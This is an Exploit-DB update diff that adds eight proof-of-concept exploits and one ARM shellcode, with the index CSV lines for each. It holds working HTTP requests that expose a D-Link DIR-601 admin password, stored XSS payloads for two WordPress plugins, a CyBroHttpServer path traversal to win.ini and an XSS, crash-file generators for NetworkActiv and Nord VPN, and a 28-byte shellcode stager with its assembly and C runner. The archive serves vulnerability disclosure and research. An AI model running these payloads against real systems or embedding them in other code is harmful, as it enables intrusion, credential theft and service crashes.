DB: 2018-08-31

8 changes to exploits/shellcodes

NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
Nord VPN 6.14.31 - Denial of Service (PoC)
Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting
DLink DIR-601 - Credential Disclosure
WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting

Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)

exploits/hardware/webapps/45306.txt

@@ -0,0 +1,68 @@
+# Exploit Title: DLink DIR-601 - Credential Disclosure
+# Google Dork: N/A
+# Date: 2018-06-24
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www.dlink.com
+# Software Link: N/A
+# Version: Firmware: 2.02NA Hardware Version B1
+# Tested on: Windows 10 + Mozilla Firefox
+# CVE : CVE-2018-12710
+ 
+# 1. Description
+# Being local to the network and having only "User" account (which is a low privilege account)
+# access, an attacker can intercept the response from a POST request to obtain "Admin"
+# rights due to the admin password being displayed in XML.
+
+# 2. Proof of Concept
+# Tools to use:
+# - BurpSuite
+# - Browser of your choice
+
+# 3: Login with "User" role account:
+*My "User" role account does not have a password in this example*
+POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.1/login_real.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 64
+DNT: 1
+Connection: close
+
+request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1
+
+# 4: When logged into the access point, click on the Tools option
+
+# 5: You should see a request similar to the following:
+
+POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: en-AU,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.1/tools_admin.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 277
+DNT: 1
+Connection: close
+
+request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver
+
+# 6: Right click on this request and choose "Do Intercept response from this request"
+
+# 7: You will see a response similar to the following:
+
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 01 Jan 2011 00:19:56 GMT
+Server: lighttpd/1.4.28
+Content-Length: 20088
+
+<?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name>
+<admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name>
+<user_user_pwd></user_user_pwd><user_level>0 ...

exploits/php/webapps/45305.txt

@@ -0,0 +1,35 @@
+# Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting
+# Google Dork: inurl:"/wp-content/plugins/jibu-pro"
+# Date: 2018-08-29
+# Exploit Author: Renos Nikolaou
+# Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip
+# Version: 1.7
+# Tested on: Kali Linux
+# CVE: N/A
+# Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities 
+# because it fails to properly sanitize user-supplied input.
+
+# PoC - Stored XSS - Parameter: name
+# 1) Login as a user who have access to Jibu Pro plugin.
+# 2) Jibu-Pro --> Create Quiz.
+# 3) At the Quiz Name type: poc"><script>alert(1)</script>  , then fill the remaining fields and click Save. 
+#   (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number])
+# 4) Click Create New Questions, fill the fields and click Save.
+# 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser.
+
+# Post Request (Step 3):
+
+POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new
+Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 512
+
+name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save

exploits/php/webapps/45307.txt

@@ -0,0 +1,33 @@
+# Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
+# Date: 2018-08-29
+# Exploit Author: Renos Nikolaou
+# Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
+# Version: 2.0
+# Tested on: Kali Linux
+# CVE: N/A
+# Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities 
+# because it fails to properly sanitize user-supplied input.
+
+# PoC - Stored XSS - Parameter: title
+# 1) Login as a user who have access to Jibu Pro plugin.
+# 2) Quizlord --> Add a Quiz.
+# 3) At the title type: poc"><script>alert(1)</script>  , then fill the remaining fields and click Save. 
+#   (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
+# 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser.
+
+# Post Request (Step 3):
+
+POST /wordpress/wp-admin/admin.php HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
+Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 188
+
+action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

exploits/windows_x86-64/dos/45302.py

@@ -0,0 +1,22 @@
+#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2018-08-30
+#Vendor Homepage: https://www.networkactiv.com/WebServer.html
+#Software Link: https://www.networkactiv.com/Dev/
+#Tested Version: 4.0 Pre-Alpha-3.7.2
+#Tested on: Windows 10 Single Language x64
+
+#Steps to produce the crash:
+#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
+#2.- Open Network.txt and copy content to clipboard
+#2.- Open NetworkActiv Web Server 4.0 
+#3.- Select Security options 
+#4.- Select "Set username" and Paste ClipBoard on "New Value" 
+#6.- Select "Set password" and Put "1234" on "New Value" 
+#7.- Crashed
+
+cod = "\x41" * 11250
+
+f = open('Network.txt', 'w')
+f.write(cod)
+f.close()

exploits/windows_x86-64/dos/45304.py

@@ -0,0 +1,24 @@
+# Exploit Title: Nord VPN <= 6.14.31 - Denial of Service (PoC)
+# Exploit Author : L0RD (borna nematzadeh)
+# Contact: borna.nematzadeh123@gmail.com
+# Date: 2018-08-30
+# Vendor Homepage : https://nordvpn.com
+# Software link: https://nordvpn.com/download/
+# Version: <= 6.14.31
+# Tested on: Windows 10
+# CVE: N/A
+
+# Steps to reproduce:
+# 1) Run the python exploit code and open "nord.txt" file
+# 2) Copy the content of file
+# 3) Open Nord vpn
+# 4) Put anything (like test@test.com) into username field and paste content of "nord.txt" into password
+# 5) Crash!
+
+#!/usr/bin/python
+
+buffer = "\x41" * 100000
+f = open ("nord.txt", "w")
+f.write(buffer)
+f.close()
+print "File created"

exploits/windows_x86-64/webapps/45303.txt

@@ -0,0 +1,26 @@
+# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
+# Date: 2018-08-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: http://www.cybrotech.com/
+# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
+# Version: v1.0.3
+# Tested on: Windows
+# CVE: CVE-2018-16133
+
+# PoC
+https://<host>\..\..\..\..\Windows\win.ini
+
+# CVE-2018-16133
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
+https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
+https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png
+
+GET \..\..\..\..\Windows\win.ini HTTP/1.1
+Host: 192.168.43.102:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
+Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1

exploits/windows_x86-64/webapps/45309.txt

@@ -0,0 +1,21 @@
+# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
+# Date: 2018-08-29
+# Exploit Author: Emre ÖVÜNÇ
+# Vendor Homepage: http://www.cybrotech.com/
+# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
+# Version: v1.0.3
+# Tested on: Windows
+# CVE-2018-16134
+
+# PoC
+http://<host>/<script>alert('xss');</script>
+
+GET <script>alert('xss');</script> HTTP/1.1
+Host: 192.168.43.102:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
+Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1

files_exploits.csv

@@ -6084,6 +6084,8 @@ id,file,description,date,author,type,platform,port
 45299,exploits/windows_x86/dos/45299.py,"Drive Power Manager 1.10 - Denial Of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
 45300,exploits/windows_x86/dos/45300.py,"Easy PhotoResQ 1.0 - Denial Of Service (PoC)",2018-08-29,"Gionathan Reale",dos,windows_x86,
 45301,exploits/windows_x86-64/dos/45301.py,"Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC)",2018-08-29,"Jose Miguel Gonzalez",dos,windows_x86-64,
+45302,exploits/windows_x86-64/dos/45302.py,"NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)",2018-08-30,"Victor Mondragón",dos,windows_x86-64,
+45304,exploits/windows_x86-64/dos/45304.py,"Nord VPN 6.14.31 - Denial of Service (PoC)",2018-08-30,L0RD,dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39895,3 +39897,8 @@ id,file,description,date,author,type,platform,port
 45284,exploits/php/webapps/45284.txt,"phpMyAdmin 4.7.x - Cross-Site Request Forgery",2018-08-29,VulnSpy,webapps,php,80
 45286,exploits/hardware/webapps/45286.py,"Episerver 7 patch 4 - XML External Entity Injection",2018-08-29,"Jonas Lejon",webapps,hardware,
 45296,exploits/windows_x86/webapps/45296.txt,"Argus Surveillance DVR 4.0.0.0 - Directory Traversal",2018-08-29,hyp3rlinx,webapps,windows_x86,
+45303,exploits/windows_x86-64/webapps/45303.txt,"Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,
+45305,exploits/php/webapps/45305.txt,"WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
+45306,exploits/hardware/webapps/45306.txt,"DLink DIR-601 - Credential Disclosure",2018-08-30,"Kevin Randall",webapps,hardware,
+45307,exploits/php/webapps/45307.txt,"WordPress Plugin Quizlord 2.0 - Cross-Site Scripting",2018-08-30,"Renos Nikolaou",webapps,php,
+45309,exploits/windows_x86-64/webapps/45309.txt,"Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting",2018-08-30,"Emre ÖVÜNÇ",webapps,windows_x86-64,

files_shellcodes.csv

@@ -906,3 +906,4 @@ id,file,description,date,author,type,platform
 45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
 45292,shellcodes/linux_x86/45292.py,"Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
+45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm

shellcodes/arm/45308.c

@@ -0,0 +1,97 @@
+/*
+Title: Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (28 Bytes)
+Date: 2018-08-30
+Tested: armv7l (Raspberry Pi 3 Model B+)
+Author: Ken Kitahara
+
+pi@raspberrypi:~ $ uname -a
+Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
+pi@raspberrypi:~ $ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Raspbian
+Description:	Raspbian GNU/Linux 9.4 (stretch)
+Release:	9.4
+Codename:	stretch
+pi@raspberrypi:~ $ cat binsh.s
+.section .text
+.global _start
+
+_start:
+    .ARM
+    add  lr, pc, #1
+    bx   lr
+
+    .THUMB
+    // execve("/bin/sh", NULL, NULL)
+    adr  r0, spawn
+    eor  r1, r1, r1
+    eor  r2, r2, r2
+    strb r2, [r0, #7]
+    mov  r7, #0xb
+    svc  #1
+
+spawn:
+.ascii "/bin/shX"
+pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
+pi@raspberrypi:~ $ ./binsh
+$ id
+uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
+$ exit
+pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' binsh.bin && echo
+\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
+pi@raspberrypi:~ $ cat stager.s
+.section .text
+.global _start
+
+_start:
+    .ARM
+    add  lr, pc, #1
+    bx   lr
+
+    .THUMB
+    // load shellcode into stack region
+    // read(0, buf, 0xff)
+    eor  r0, r0, r0
+    mov  r1, sp
+    mov  r2, #0xff
+    mov  r7, #3
+    svc  #1
+
+    // change to ARM state
+    eor  r7, r7, r7
+    mov  lr, pc
+    bx   lr
+
+    .ARM
+    mov  pc, r1
+pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
+pi@raspberrypi:~ $ (echo -en "\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
+id
+uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
+exit
+^C
+pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' stager.bin && echo
+\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x69\x46\xff\x22\x03\x27\x01\xdf\x7f\x40\xfe\x46\x70\x47\x01\xf0\xa0\xe1
+pi@raspberrypi:~ $
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char sc[] = \
+"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
+"\x40\x40\x69\x46\xff\x22\x03\x27"
+"\x01\xdf\x7f\x40\xfe\x46\x70\x47"
+"\x01\xf0\xa0\xe1";
+
+void main()
+{
+    printf("Shellcode Length: %d\n", strlen(sc));
+
+    int (*ret)() = (int(*)())sc;
+
+    ret();
+}